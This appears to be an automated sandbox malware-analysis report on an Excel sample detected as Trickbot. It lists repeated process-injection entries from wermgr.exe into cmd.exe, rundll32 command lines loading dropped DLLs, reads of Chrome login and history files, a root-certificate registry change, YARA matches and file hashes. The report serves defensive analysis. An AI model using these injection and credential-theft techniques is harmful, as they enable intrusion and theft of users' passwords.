Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 130000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 130000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 130000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 130000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 130000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 130000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 130000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 130000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 130000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 130000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 130000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 130000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 130000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 130000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 130000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 130000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 130000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 130000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 130000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 130000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 130000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 130000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 180001000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 180001000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 18009A000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 18009A000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 1800B5000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 1800B5000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 1800BA000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 1800BA000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 130000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 70000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 130000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 140000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 150000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 260000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 70000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 140000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 260000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 280000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 290000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 4B0000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 70000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 60000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 70000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 49D790B4	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 1E60000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 1E70000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 70000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 1E60000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 1E70000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 70000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 1E60000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 1E60000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 1E60000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 1E60000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 1E60000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 1E60000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 1E60000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 1E60000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 1E60000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 1E60000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 1E60000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 1E60000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 1E60000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 1E60000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 1E60000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 1E60000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 1E60000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 1E60000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 1E60000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 1E60000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 1E60000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 1E60000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 1E60000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 1E60000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 1E60000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 1E60000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 1E60000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 1E60000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 1E60000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 1E60000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 1E60000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 1E60000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 1E60000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 1E60000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 1E60000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 1E60000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 1E60000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 1E60000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 1E60000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 1E60000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 1E60000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 1E60000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 1E60000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 1E60000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 1E60000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 1E60000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 1E60000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 1E60000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 1E60000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 1E60000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 1E60000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 1E60000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 1E60000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 1E60000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 1E60000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 1E60000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 1E60000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 1E60000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 1E60000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 1E60000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 1E60000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 1E60000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 1E60000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 1E60000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 1E60000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 1E60000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 1E60000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 1E60000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 1E60000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 1E60000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 1E60000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 1E60000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 1E60000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 1E60000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 1E60000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 1E60000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 1E60000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 1E60000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 1E60000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 1E60000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 1E60000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 1E60000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 1E60000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 1E60000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 1E60000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 1E60000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 1E60000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 1E60000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 1E70000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 1E60000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 1E60000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 180001000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 180001000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 18005D000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 18005D000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 180079000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 180079000	Jump to behavior

Creates a process in suspended mode (likely to inject code)

Source: C:\Windows\System32\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32 ..\fndskfnds.dfm,StartW	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\System32\wermgr.exe C:\Windows\system32\wermgr.exe	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe	Jump to behavior
Source: C:\Windows\System32\taskeng.exe	Process created: C:\Windows\System32\rundll32.exe C:\Windows\system32\rundll32.EXE 'C:\Users\user\AppData\Roaming\iDownloadManager1882563550\kufndskfndszi.dwn',StartW	Jump to behavior

Source: wermgr.exe, 00000005.00000002.2370606855.0000000000860000.00000002.00000001.sdmp	Binary or memory string: Program Manager
Source: wermgr.exe, 00000005.00000002.2370606855.0000000000860000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd
Source: wermgr.exe, 00000005.00000002.2370606855.0000000000860000.00000002.00000001.sdmp	Binary or memory string: !Progman

Language, Device and Operating System Detection:

Queries the volume information (name, serial number etc) of a device

Source: C:\Windows\System32\wermgr.exe

Queries volume information: C:\ VolumeInformation

Jump to behavior

Source: C:\Windows\System32\taskeng.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Lowering of HIPS / PFW / Operating System Security Settings:

Adds / modifies Windows certificates

Source: C:\Windows\System32\wermgr.exe

Registry key created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 Blob

Jump to behavior

Stealing of Sensitive Information:

Yara detected Trickbot

Source: Yara match

File source: Process Memory Space: wermgr.exe PID: 1776, type: MEMORY

Yara detected Trickbot

Source: Yara match	File source: 00000004.00000002.2105353530.0000000002460000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2104607915.0000000000290000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2104542682.00000000001D0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 4.2.rundll32.exe.1d0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.rundll32.exe.2460000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.rundll32.exe.2460000.8.unpack, type: UNPACKEDPE

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\System32\cmd.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data.bak	Jump to behavior
Source: C:\Windows\System32\cmd.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\System32\cmd.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History.bak	Jump to behavior
Source: C:\Windows\System32\cmd.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data.bak	Jump to behavior
Source: C:\Windows\System32\cmd.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Windows\System32\cmd.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior

Remote Access Functionality:

Yara detected Trickbot

Source: Yara match

File source: Process Memory Space: wermgr.exe PID: 1776, type: MEMORY

Yara detected Trickbot

Source: Yara match	File source: 00000004.00000002.2105353530.0000000002460000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2104607915.0000000000290000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2104542682.00000000001D0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 4.2.rundll32.exe.1d0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.rundll32.exe.2460000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.rundll32.exe.2460000.8.unpack, type: UNPACKEDPE

ID:	403507
Product:	CloudBasic
Start time:	06:48:10
Start date:	04.05.2021
Sample:	SecuriteInfo.com.Heur.31681.20936
Cookbook:	defaultwindowsofficecookbook.jbs
System description:	Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Architecture:	WINDOWS
MD5:	6f7f78fa1fbe9be8fbe20812658c43aa
SHA1:	d3f78f528a797c2e97af9f25e189bc43d98f2eae
SHA256:	4d05d391297e3c4ec1bc4047bd3e104f37123c709797854053966ced43f492fb
Filetype:	Microsoft Excel sheet (30009/1) 78.94%

Name	Type	MD5	SHA1	SHA256
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506	Microsoft Cabinet archive data, 58596 bytes, 1 file	61A03D15CF62612F50B74867090DBE79	15228F34067B4B107E917BEBAF17CC7C3C1280A8	F9E23DC21553DAA34C6EB778CD262831E466CE794F4BEA48150E8D70D3E6AF6D
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506	data	79B44DDA691327BDA128A6BCF94C491C	3BC241485CCFFA18F61AE47CB814B05E31D45DF3	C465AF316711C90DC7588906C0BA938DFEB934C385D0C8B96546E9DF06840B77
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History.bak	SQLite 3.x database, last written using SQLite version 3032001	AEE054CEBAB27FF921F10325627DBAF4	FCE2FB98C6FB7F4B59877909B314F948BF91B19D	380980EA5623B2D84A074DDE44C164554E3D2CBA0149F73C55EDE2D7F0220AA5
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data.bak	SQLite 3.x database, last written using SQLite version 3032001	CD5ACB5FAA79EEB4CDB481C6939EEC15	527F3091889C553B87B6BC0180E903E2931CCCFE	D86AE09AC801C92AF3F2A18515F0C6ACBFA162671A7925405590CA4959B51E96
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data.bak	SQLite 3.x database, last written using SQLite version 3032001	9A38AC1D3304A8EEFD9C54D4EADCCCD6	56E953B2827B37491BC80E3BFDBBF535F95EDFA7	67960A6297477E9F2354B384ECFE698BEB2C1FA1F9168BEAC08D2E270CE3558C
C:\Users\user\AppData\Local\Google\Chrome\User Data\Local State.bak	ASCII text, with very long lines, with no line terminators	4E06FDEE66DA477D15AAAFD104802FF3	2814763828D036134EEF93F28D6C499913E903AA	835ADDCE810330CA6D1FE5AA598CB758B639173086517BEBC6B0AAC7CBFDAA1D
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\netmouser[1].dll	PE32 executable (DLL) (native) Intel 80386, for MS Windows	EB70B6C24C0466954169882DBE5729A4	B81BCD8273854EFB7D7B3FB5B982D75051A5D9A6	C6F319A3EDA16BEF437421920E2945AB4B3101CB27AD2F291C3DACDF84BB2240
C:\Users\user\AppData\Local\Temp\83EE0000	data	2107602F6F3992BCEC69933AF1782C13	2F013C6B34182B7ABB63A8E10046906BBDB08642	083BD42C47B82BA299AE4D5A4FD0A78A05B4EA364346DA1204FA76DC632D3A81
C:\Users\user\AppData\Local\Temp\CabEB4A.tmp	Microsoft Cabinet archive data, 58596 bytes, 1 file	61A03D15CF62612F50B74867090DBE79	15228F34067B4B107E917BEBAF17CC7C3C1280A8	F9E23DC21553DAA34C6EB778CD262831E466CE794F4BEA48150E8D70D3E6AF6D
C:\Users\user\AppData\Local\Temp\TarEB4B.tmp	data	4E0487E929ADBBA279FD752E7FB9A5C4	2497E03F42D2CBB4F4989E87E541B5BB27643536	AE781E4F9625949F7B8A9445B8901958ADECE7E3B95AF344E2FCB24FE989EEB7
C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Desktop.LNK	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Read-Only, Directory, ctime=Tue Oct 17 10:04:00 2017, mtime=Tue May 4 12:48:43 2021, atime=Tue May 4 12:48:43 2021, length=8192, window=hide	C1DA831FF8C1D36AE69AD9648E49CF28	E1AB2CB44E2BFE52BBA52912CC34EBA39272E1D2	086B9F8767675BC5FF71428A932AE7504CB6286E737572D0263205B15AF9192F
C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\SecuriteInfo.com.Heur.31681.LNK	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Tue May 4 12:48:28 2021, mtime=Tue May 4 12:48:43 2021, atime=Tue May 4 12:48:43 2021, length=111104, window=hide	250A7D92FD78751441072A24FBA1B2AF	1D1DF5D3BB1D8982F6F4FFD67502C14D34E5432F	E7636903BB5571D9B3771BB00881ECF078D5A773B95790C1DC0C795FFE0ED39D
C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat	ASCII text, with CRLF line terminators	C58F93CF376E5D4BD44FAE4A9737CB5F	6512FC58013828CAA0B38A16AB94962E964CC133	9167F4CA112D0ACAD8BB834E1AB16188D3E877DDFA98AC25E23EC80A2F7B7154
C:\Users\user\Desktop\54EE0000	Applesoft BASIC program data, first line number 16	DE0A95531476C137D89DD37F7117A28C	B862DE4DCD843F0D5F44C7F22588CFBEAF4899A0	B689C1ED4548E6FC9D9E4C7FF05540A8A02DA1DA8F70E2D7E2F2A433C29A19F0
C:\Users\user\fndskfnds.dfm	PE32 executable (DLL) (native) Intel 80386, for MS Windows	EB70B6C24C0466954169882DBE5729A4	B81BCD8273854EFB7D7B3FB5B982D75051A5D9A6	C6F319A3EDA16BEF437421920E2945AB4B3101CB27AD2F291C3DACDF84BB2240
C:\Windows\System32\cn\aexsxmcq.txt	data	AB4E12A390F55FE62FBD75F6ADDB4119	6F0E035EC4C30DA12391DC4B399150D9E81AB14F	7859D3EAD3793DFCA50DA95C8BFFE076072AECB63C337B6CC6A502ECAAE7B681

Analysis Report SecuriteInfo.com.Heur.31681.20936

Overview

General Information

Detection

Signatures

Classification

Signatures

AV Detection:

Cryptography:

Compliance:

Spreading:

Software Vulnerabilities:

Networking:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Boot Survival:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Lowering of HIPS / PFW / Operating System Security Settings:

Stealing of Sensitive Information:

Remote Access Functionality:

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Contacted Domains

Contacted URLs